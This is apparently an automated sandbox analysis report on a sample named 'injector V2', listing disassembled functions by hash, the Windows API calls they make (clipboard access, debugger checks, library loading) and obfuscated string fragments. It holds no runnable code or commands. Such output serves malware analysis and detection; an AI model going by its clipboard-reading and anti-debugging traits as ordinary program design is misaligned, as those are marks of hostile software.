                                                                          • Opcode Fuzzy Hash: 7af8eb769a22ffdd9c16f70ad9e8ac92724860ad1783acaeed051abb327547b5
                                                                          • Instruction Fuzzy Hash: 14D151B0A10305DFE7149F56D989FA97BB1FB02344F1A86E9C0986F366D738804ACF95
                                                                          APIs
                                                                          • LdrInitializeThunk.NTDLL(0043D9CC,?,00000004,?), ref: 0043FAEE
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: 5|iL
                                                                          • API String ID: 2994545307-1880071150
                                                                          • Opcode ID: 83b537e1dbfce20351aee27e641240664600955f68c64c0c17fc60d0245b25f2
                                                                          • Instruction ID: 43f1eb5f3548b8c432c73a1bceca2e042cd2c203e57e815d305badc86f4c0f4b
                                                                          • Opcode Fuzzy Hash: 83b537e1dbfce20351aee27e641240664600955f68c64c0c17fc60d0245b25f2
                                                                          • Instruction Fuzzy Hash: 044134756083015FF310AB65CD81B3BB392FB85754F64852EFA81973A1D7B9AC10C689
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: @
                                                                          • API String ID: 2994545307-2766056989
                                                                          • Opcode ID: 0fdf649a435d52ac5a5c732e35b5cc11cd3da3e93830bd9053ff5a02c8acc1e3
                                                                          • Instruction ID: 5acdffe69cae81505c966d96251ea0ad62df83d0dc16d0938e8163ba38f455d3
                                                                          • Opcode Fuzzy Hash: 0fdf649a435d52ac5a5c732e35b5cc11cd3da3e93830bd9053ff5a02c8acc1e3
                                                                          • Instruction Fuzzy Hash: 2B4176729052118BE704DF25C81163B73E2FFD1318F55852DE8899B3A1EBB8E909C7D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: @
                                                                          • API String ID: 2994545307-2766056989
                                                                          • Opcode ID: 8781769afd4aa028674d63a44a834a4a6058f55748eaeae4e69f9ed47e2d63b1
                                                                          • Instruction ID: 99004e87afd797850f2fb78f1faed6addb5c420ce39fc80ff8fa90756be4e84e
                                                                          • Opcode Fuzzy Hash: 8781769afd4aa028674d63a44a834a4a6058f55748eaeae4e69f9ed47e2d63b1
                                                                          • Instruction Fuzzy Hash: DC3121755083048FD310EF64C8C062BB7F5FF99354F54882EEA8587391E7B99908CB9A
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c1299ea76509b8ea174bbc27c620a2ba69db1fea38cb3e09b8d27ccae7010ce8
                                                                          • Instruction ID: 24ce980ff4f6a58d627c685f9a4cb555664744d48782882c0fbc1f5ad465b730
                                                                          • Opcode Fuzzy Hash: c1299ea76509b8ea174bbc27c620a2ba69db1fea38cb3e09b8d27ccae7010ce8
                                                                          • Instruction Fuzzy Hash: 10C18976908200DBD704AF24DC5266B73B1FF95324F09453DE986873D2EB78AD41C79A
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 835fdbe9f719ff9c678dd2fe7c4a398285577e040ef0fd01f1e545fa34785d9f
                                                                          • Instruction ID: 157b9ebd1fe4a75857c22b0bdacde9d678e39962d3e493a910878895a0df6080
                                                                          • Opcode Fuzzy Hash: 835fdbe9f719ff9c678dd2fe7c4a398285577e040ef0fd01f1e545fa34785d9f
                                                                          • Instruction Fuzzy Hash: 7641476024A7D14FE326CB369460763BFE29F93304F5888AED0C78B292D6386806CB55
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043D250
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 8f3f030fb2c71fb7353a24ddfee776e8ee3b382a80aff1999716a4c3522fdbc1
                                                                          • Instruction ID: 38339d0474cf5488c706bdac48296e0f0b6fb5e2a390aa9d9df206c512bdb354
                                                                          • Opcode Fuzzy Hash: 8f3f030fb2c71fb7353a24ddfee776e8ee3b382a80aff1999716a4c3522fdbc1
                                                                          • Instruction Fuzzy Hash: DC016D35A0C2908FD7095B38FC6246F7B52EB97714F14157CD8C293A64C7359C11CB89
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(B11B8F15,00000000,03020900), ref: 0040A0EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 85d5bdf79e67eb47774ed4a15c4dc7e71fa5b6f65d207fa871d370558ccbd849
                                                                          • Instruction ID: eec8e4d5abda4dd1e9db2bbec8688eaefad9b2efc4fc356c0bbc1d4a18304db3
                                                                          • Opcode Fuzzy Hash: 85d5bdf79e67eb47774ed4a15c4dc7e71fa5b6f65d207fa871d370558ccbd849
                                                                          • Instruction Fuzzy Hash: A011DF3025D3A04BC3149B2188967AFBBE5EBE6308F18892DE1C557381C77C950A8B6B
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: BlanketProxy
                                                                          • String ID:
                                                                          • API String ID: 3890896728-0
                                                                          • Opcode ID: 960cd3bc9b8fafb9bc18a88fe50f5d4fa7e29375ade0a4599853ce488b78a79b
                                                                          • Instruction ID: 0423a9b642b6b397783e3dfe323d9de4dd2d31f2713e8749b62edf797a23f73d
                                                                          • Opcode Fuzzy Hash: 960cd3bc9b8fafb9bc18a88fe50f5d4fa7e29375ade0a4599853ce488b78a79b
                                                                          • Instruction Fuzzy Hash: E6F0F9B86193418FD390DF14C4A875ABBE1BBC5308F14C92CE4988B394DBB59548CF82
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: BlanketProxy
                                                                          • String ID:
                                                                          • API String ID: 3890896728-0
                                                                          • Opcode ID: 60de41b2be0a5049a60b76abd15c3a914ed7616a6115ed82c89a2c5beda3207b
                                                                          • Instruction ID: 9ef2ec95defbe811da9df7f73394960e27298bce3209d78997cf439bd599a4ac
                                                                          • Opcode Fuzzy Hash: 60de41b2be0a5049a60b76abd15c3a914ed7616a6115ed82c89a2c5beda3207b
                                                                          • Instruction Fuzzy Hash: 1AF0B7B4109701CFD354DF28C0A8B1ABBF1FB89304F00881CE4958B3A0DB76A948CF82
                                                                          APIs
                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D2F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeSecurity
                                                                          • String ID:
                                                                          • API String ID: 640775948-0
                                                                          • Opcode ID: 0513e9e4faa0fe301388e6d48941e819c9196826d588494003b1330ec966144b
                                                                          • Instruction ID: 353a1201628b11d32b5d18849e77655b55e9a536d8fe0a4044a9c1789a7b6920
                                                                          • Opcode Fuzzy Hash: 0513e9e4faa0fe301388e6d48941e819c9196826d588494003b1330ec966144b
                                                                          • Instruction Fuzzy Hash: 6DE01735BE5B0567FA684718EC07F4422426386B61F3C8368B311EE6E8CDF8B001450C
                                                                          APIs
                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D2C3
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize
                                                                          • String ID:
                                                                          • API String ID: 2538663250-0
                                                                          • Opcode ID: 696aab15c1f5ca53f29d23ed7225efa0109973e3bc5d25c60111ef6268dc21b3
                                                                          • Instruction ID: 9e1670af7ad334bbccc9b10d5b72e0f5980304cee9ffeec64b1b62a7ed01c319
                                                                          • Opcode Fuzzy Hash: 696aab15c1f5ca53f29d23ed7225efa0109973e3bc5d25c60111ef6268dc21b3
                                                                          • Instruction Fuzzy Hash: B5D0A734954A446BD244772DEC0FF1A366CA743765F40023DB2A2C61E2DD906910C569
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                          • String ID: C$C$E$F$J$M$T$[$^$_$x
                                                                          • API String ID: 2832541153-1009912999
                                                                          • Opcode ID: 80fb963e721157add25bdcb93e767848dcc1c4e48d0ce26f06ec10453953b760
                                                                          • Instruction ID: 649da8ff6edbeae9ac6a437e036de8b4666048049ac1a5994b2f6b4b394acba0
                                                                          • Opcode Fuzzy Hash: 80fb963e721157add25bdcb93e767848dcc1c4e48d0ce26f06ec10453953b760
                                                                          • Instruction Fuzzy Hash: 894170B150C7818FD300AF78D98931FBFE0AB96315F08492DE5D587382D6BD85898B97
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: }B$:B$Aq$LS$MY$R'_)$UK$^+v-$`F$c#T%$qo$vC3'$zC3'$~F$31$WY$t*&$wq${e
                                                                          • API String ID: 0-3774008810
                                                                          • Opcode ID: 13d58b617d83f207513afcf0ac7916043c748302f00dcca38fa9acfbd97f3399
                                                                          • Instruction ID: 1fa151b182754a02b184cb83e181f89f3944c2d731a9443aa8d7f8763e1ea196
                                                                          • Opcode Fuzzy Hash: 13d58b617d83f207513afcf0ac7916043c748302f00dcca38fa9acfbd97f3399
                                                                          • Instruction Fuzzy Hash: 48B2A5B8909269CBDB24CF14D8807AEBBB1FF45300F5481EDD4896B385DB785A86CF85
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: }B$:B$Aq$LS$R'_)$UK$^+v-$`F$c#T%$qo$~F$%'$31$WY$t*&$wq${e
                                                                          • API String ID: 0-2025126219
                                                                          • Opcode ID: aa81146f536594075b42785c8aca355dd7fdd06af9277e64a8c543a63ab1a5f0
                                                                          • Instruction ID: 35be8ed4cd7e98465d1cfdd550cc4534ee506dcf831e133602459afd556982a2
                                                                          • Opcode Fuzzy Hash: aa81146f536594075b42785c8aca355dd7fdd06af9277e64a8c543a63ab1a5f0
                                                                          • Instruction Fuzzy Hash: A0B2A6B8E09229CBDB24CF54D8817AEBBB1FF45300F5481E9D4896B345DB385A86CF85
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: }B$:B$Aq$LS$R'_)$UK$^+v-$`F$c#T%$qo$~F$31$WY$t*&$wq${e
                                                                          • API String ID: 0-1828368214
                                                                          • Opcode ID: 3104133428518d540902ac34a2fb488368386e526f2901aa799005266d204350
                                                                          • Instruction ID: 09ec192c9ec58bcb8b84ec17ce1a8ce17df0356576050d5bd0ea5ed05ac0c503
                                                                          • Opcode Fuzzy Hash: 3104133428518d540902ac34a2fb488368386e526f2901aa799005266d204350
                                                                          • Instruction Fuzzy Hash: 7DA295B8D09269CBDB24CF14D8807AEBBB0FF45300F5481E9D4896B385DB385A86CF85
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: *&?$$3HcP$7()&$8,11$:&Dl$<G24$=.dA$KKPV$O'TT$WDHZ$y_~)
                                                                          • API String ID: 0-2957815121
                                                                          • Opcode ID: 8b0410b2f0906d4672b5830e34e8af8f7a50d67c60768b032dddc266aa8ccbe9
                                                                          • Instruction ID: aa318e9326affcfdb16590794bee10af8737c8e06ecfdbf9e32c06abea71cbdf
                                                                          • Opcode Fuzzy Hash: 8b0410b2f0906d4672b5830e34e8af8f7a50d67c60768b032dddc266aa8ccbe9
                                                                          • Instruction Fuzzy Hash: 0891E3B0604B808BD325CF3998A17A3BFE1AF96300F59896DC1EB4B381D7386406CB55
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: +S$D$H$MM$VK$`[$fa
                                                                          • API String ID: 0-80346802
                                                                          • Opcode ID: 8c35754ae7fc4170c5abd4450aca1baeb1e871a515077f9623e7678d87ff2c54
                                                                          • Instruction ID: e249e24f014c48fe1b5423826c1da1bde9dce5a0214780fb9f8959d4c3bf61a2
                                                                          • Opcode Fuzzy Hash: 8c35754ae7fc4170c5abd4450aca1baeb1e871a515077f9623e7678d87ff2c54
                                                                          • Instruction Fuzzy Hash: 5F0288B44483908BE320CF25C8A17ABBBF1FF91348F14995DD4C94B391E3B98945CBA6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: -yum$;{u$Qxhf$Zl'$[g2a$e
                                                                          • API String ID: 0-702493259
                                                                          • Opcode ID: 508e3e81598fd8e61b8768262e0d853c53ea9ecd44e7befdc624575d6b80e953
                                                                          • Instruction ID: d0710d3571aefb8fc1d20725ee6de154d627606741ea491bbc11d971cf737a3c
                                                                          • Opcode Fuzzy Hash: 508e3e81598fd8e61b8768262e0d853c53ea9ecd44e7befdc624575d6b80e953
                                                                          • Instruction Fuzzy Hash: 71824375A083518FD714CF29E85132BB7E2EFC5314F498A3DE8958B392DB389815CB86
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00605450
                                                                          • IsDebuggerPresent.KERNEL32 ref: 0060551C
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0060553C
                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00605546
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                          • String ID:
                                                                          • API String ID: 254469556-0
                                                                          • Opcode ID: 03ea4696780bfd4e7b21b89c1361e0566fe44533df57a800dfa273d2f1caeeb6
                                                                          • Instruction ID: 536bdf5355725d5218292da1f140347a6c255d01c44a91b0c3a774b3ce24b9eb
                                                                          • Opcode Fuzzy Hash: 03ea4696780bfd4e7b21b89c1361e0566fe44533df57a800dfa273d2f1caeeb6
                                                                          • Instruction Fuzzy Hash: 4E311875D452189BDF11DFA4D9897CEBBF9BF08304F1080AAE40DAB290EB709A85CF55
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4Z$SR$W`$X\
                                                                          • API String ID: 0-4161418099
                                                                          • Opcode ID: c6f3e7611f723f7eb55f501b0840374f3d0062e9c81a9c2b84b1d528a3d401d5
                                                                          • Instruction ID: 89be3030dedfbe0b031de29427f6c63e8abad01b4acb32e386f7cddbb688a063
                                                                          • Opcode Fuzzy Hash: c6f3e7611f723f7eb55f501b0840374f3d0062e9c81a9c2b84b1d528a3d401d5
                                                                          • Instruction Fuzzy Hash: E1F155759083118BC710CF14C8912ABB7F1FFA5354F18992DE8C95B3A1E378D98AC78A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ,-$57
                                                                          • API String ID: 0-1747932499
                                                                          • Opcode ID: 5a033db35ed4ec029857596d6423e8965e5a341052786567b0ba29b5e6dcc15f
                                                                          • Instruction ID: 5799269420324ea627bcc4f0c2ab9c1f658a7317cea54ba45ff83523ad6f09d5
                                                                          • Opcode Fuzzy Hash: 5a033db35ed4ec029857596d6423e8965e5a341052786567b0ba29b5e6dcc15f
                                                                          • Instruction Fuzzy Hash: 2EA1FFB56083509BD7209F25E88136BBBE1FFC2358F44492DE0C58B391D779880ACB9B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Y^S$'c"?$UjcW$YRTP
                                                                          • API String ID: 0-406344231
                                                                          • Opcode ID: a3c115ff45babdea3d1f68228492ccc2670869cf7d81e033d977328bf23dd762
                                                                          • Instruction ID: e32894b5f640953469bc4cdcacc1f8aace832cacb3fb2d239944e8ea458795a4
                                                                          • Opcode Fuzzy Hash: a3c115ff45babdea3d1f68228492ccc2670869cf7d81e033d977328bf23dd762
                                                                          • Instruction Fuzzy Hash: 1FE14675A0C3518BD7049F25A84026BB7E1AFD6304F08887EE8D59B382E739DD09CB5A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #:EX$/:EX$|
                                                                          • API String ID: 0-1498014989
                                                                          • Opcode ID: f641b2e1d107a67fe1cb44df5131b8b3c9f0b50c04125af42b221465f5728ed2
                                                                          • Instruction ID: ebff1a44856993e5f9e47a75cfa2fb170ad94dd6b4a2f3f243944e431b16b645
                                                                          • Opcode Fuzzy Hash: f641b2e1d107a67fe1cb44df5131b8b3c9f0b50c04125af42b221465f5728ed2
                                                                          • Instruction Fuzzy Hash: A35143B19193918BC714CF24C8516ABBBB1EFC3344F49995DE8C29B350E3789940C796
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .Bki$bP! ${^e\
                                                                          • API String ID: 0-3819303242
                                                                          • Opcode ID: 09ed14783806bd4fbfc42d851a80e352a5c29ad13945dae2a80825908b35f2db
                                                                          • Instruction ID: 013273dd4b985b783192888b96fd38fda426fbccee9ab40bd8bd226eb6613383
                                                                          • Opcode Fuzzy Hash: 09ed14783806bd4fbfc42d851a80e352a5c29ad13945dae2a80825908b35f2db
                                                                          • Instruction Fuzzy Hash: F6415B31A197914BC758CF2480923ABBBE2AFD2344F58546EE4C1CB356D63DC8468B82
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: K7$`b]}
                                                                          • API String ID: 2994545307-3709244666
                                                                          • Opcode ID: e92ef98e99700fa30022095c108e7e2910c6ad951a836458eb8a3676427af6ea
                                                                          • Instruction ID: 2553cb39f39268861783624d4a3bff072a18932582e306d74ca000491a559b48
                                                                          • Opcode Fuzzy Hash: e92ef98e99700fa30022095c108e7e2910c6ad951a836458eb8a3676427af6ea
                                                                          • Instruction Fuzzy Hash: E61228746487408BD724CB34DCD1ABB77E2FB96314F28867ED092872A1D7359847CB8A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: !!D$2 D
                                                                          • API String ID: 0-2041540080
                                                                          • Opcode ID: 227d1dcddf45e72dd6b098785f3170ba4591dd8df55e49aa93aa11c5214a2e53
                                                                          • Instruction ID: 820dda57bfc0c069450d73c64b0f86272794a7f7300f0505425411bada8820d0
                                                                          • Opcode Fuzzy Hash: 227d1dcddf45e72dd6b098785f3170ba4591dd8df55e49aa93aa11c5214a2e53
                                                                          • Instruction Fuzzy Hash: 6112253AA09251CFC308CF28E8D166AB7E2FBCA314F1E857DD58697361C635E845CB85
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: !!D$2 D
                                                                          • API String ID: 0-2041540080
                                                                          • Opcode ID: 20871c927d7cc54915ad606464a0109514e61071a6d9d9d71db3c6e02648ee9e
                                                                          • Instruction ID: b13b4070a8921637b56cfddfab7054103327da83aceea9e49993121eb1f69e98
                                                                          • Opcode Fuzzy Hash: 20871c927d7cc54915ad606464a0109514e61071a6d9d9d71db3c6e02648ee9e
                                                                          • Instruction Fuzzy Hash: B3023736A092518FD308CF38E8D126BB7E2EBCA354F1E857ED48697361C635E845CB85
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: de$}{
                                                                          • API String ID: 0-2652959902
                                                                          • Opcode ID: dba4710397c69c293084f6f83ec3cae58eda94e645e9928b6d018490e0e5cf61
                                                                          • Instruction ID: b8209a5c5182adddfc4a3f7ad7ee9c1e8731f02ef26c3de1d33901564b30210a
                                                                          • Opcode Fuzzy Hash: dba4710397c69c293084f6f83ec3cae58eda94e645e9928b6d018490e0e5cf61
                                                                          • Instruction Fuzzy Hash: 5CC124B4D103018BCB24DF28C8926BBB7B1FF45310F1991AAD855AF395E7389946CB98
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: de$}{
                                                                          • API String ID: 0-2652959902
                                                                          • Opcode ID: 6f31d01ef21908fb0d6247969a3445455507d79ed9dc74f862e87c9cb719ea47
                                                                          • Instruction ID: 5a4b5e3c4749a8dab7cc5bf484e405dad867a17854ab2fa7c028c701f221f4b3
                                                                          • Opcode Fuzzy Hash: 6f31d01ef21908fb0d6247969a3445455507d79ed9dc74f862e87c9cb719ea47
                                                                          • Instruction Fuzzy Hash: ECB147B19103108BCB24CF24C8927B777B2FFA5310B19926ED8465F399E739AC46C798
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RK@$]M@
                                                                          • API String ID: 0-1819635796
                                                                          • Opcode ID: 3ddecef2f22dfce23df13f5b0330299b693dece867d661a49c51be7dbf88b829
                                                                          • Instruction ID: 467636eddeb98ea21962c02840cb1ffeddf6ab606cafb9d112bccd5d25d25d27
                                                                          • Opcode Fuzzy Hash: 3ddecef2f22dfce23df13f5b0330299b693dece867d661a49c51be7dbf88b829
